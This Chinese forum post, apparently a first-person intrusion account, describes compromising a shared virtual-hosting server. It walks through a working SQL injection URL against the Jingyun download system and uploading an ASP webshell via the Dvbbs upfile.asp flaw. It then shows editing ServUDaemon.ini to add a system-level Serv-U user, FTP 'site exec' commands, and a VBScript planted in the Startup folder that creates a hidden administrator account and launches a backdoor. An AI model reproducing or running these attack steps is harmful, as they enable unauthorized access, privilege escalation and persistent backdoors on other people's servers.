黑客对一台虚拟主机服务器的渗透
前几天听一树说了惊云下载系统的漏洞 <br />问题文件出在admin/user.asp <br />
提交 <br />
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1 <br />
就相当于: <br />
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’"
利用access注入得到管理员密码 <br />
上面有一个文件upfile.htm <br />
手工利用了下动网的upfile.asp漏洞 <br />
就成功上传了个asp木马 <br />
然后那个虚拟主机的c,d盘是NTFS分区 <br />
不能访问E盘装着servu,php,webmail, <br />
F盘是虚拟站点 <br />
servu安装目录可写~ <br />
本来打算替换他servu文件的~但是觉的太麻烦 <br />
还容易让管理员怀疑 <br />
想起servu的本地提升来了
在自己计算机上装了个servu <br />
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 <br />
然后去servu安装目录里看ServUDaemon.ini <br />
格式是这样的 <br />
<br />
Version=5.0.0.11 <br />
LocalSetupPassword=072C63105200180D5C07170A7E3E <br />
LocalSetupPortNo=60628 <br />
ProcessID=972 <br />
<br />
Domain1=192.168.0.102||21|向导产生域|1|0|0 <br />
Domain2=192.168.0.102||2121|123|2|0|0 <br />
<br />
User1=www|1|0 <br />
<br />
Password=ih0C292E1AC82920B7F384007F302A1296 <br />
HomeDir=D:\xiaoben <br />
TimeOut=600 <br />
Note1="Wizard generated account" <br />
Access1=D:\xiaoben|RLPWAMCD <br />
SKEYValues= <br />
<br />
User1=rover|1|0 <br />
User2=123|1|0 <br />
<br />
Password=dx5D12C060F16C7166779414FA038E881D <br />
HomeDir=c:\ <br />
TimeOut=600 <br />
Maintenance=System <br />
Access1=C:\|RWAMELCDP <br />
SKEYValues= <br />
<br />
Password=kv3F6EED70340AD1478ADF95963A07FD00 <br />
HomeDir=c:\ <br />
TimeOut=600 <br />
Access1=C:\|RWAMLCDP <br />
SKEYValues= <br />
---------------- <br />
其中rover用户就是我添加的那个 <br />
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini <br />
访照我本地的INI写进一个用户进去 <br />
User1=rover|1|0 <br />
<br />
Password=dx5D12C060F16C7166779414FA038E881D <br />
HomeDir=c:\ <br />
TimeOut=600 <br />
Maintenance=System <br />
Access1=C:\|RWAMELCDP <br />
SKEYValues= <br />
保存~
用我新建的用户和密码连接~ <br />
好的,还是连上了 <br />
ftp <br />
ftp>open ip<br />
Connected to ip. <br />
220 Serv-U FTP Server v5.0.0.4 for WinSock ready... <br />
User (ip:(none)): id //输入构造的用户 <br />
331 User name okay, please send complete E-mail address as password. <br />
Password:password //密码 <br />
230 User logged in, proceed. <br />
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。 <br />
250 Directory changed to /WINNT <br />
ftp>cd system32 //进入system32目录 <br />
250 Directory changed to /WINNT/system32 <br />
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。 <br />
提示没有权限~郁闷~ <br />
但是我们有对C盘的访问权限了是不~hoho~ <br />
把后门(server.exe)传他system32目录 <br />
然后写一个VBs教本 <br />
set wshshell=createobject ("wscript.shell")<br />
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)<br />
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0) <br />
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0) <br />
b=wshshell.run ("cmd.exe /c server.exe",0)
存为HELP.vbe <br />
这个教本的作用是修改tsinternetuser用户密码为rover1234 <br />
并且提升为管理员 <br />
然后执行system32目录下的server.exe <br />
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动 <br />
目录 <br />
这样管理员只要一登陆就会执行那个教本~ <br />
接下来就是等了~ <br />
等他登陆~ <br />
等了一段时间(看了一部蜘蛛侠的时间吧)~ <br />
连接后门~得到admin权限的shell <br />
hoho~ <br />
接下来是善后工作了~就不说了 <br />
今天心情非常糟~有一些事情压的我喘不过气来 <br />
考试的时候当老师面把卷子撕了,然后扬步走了~ <br />
妈妈的~过程写的很乱~见谅
<br />
頁:
[1]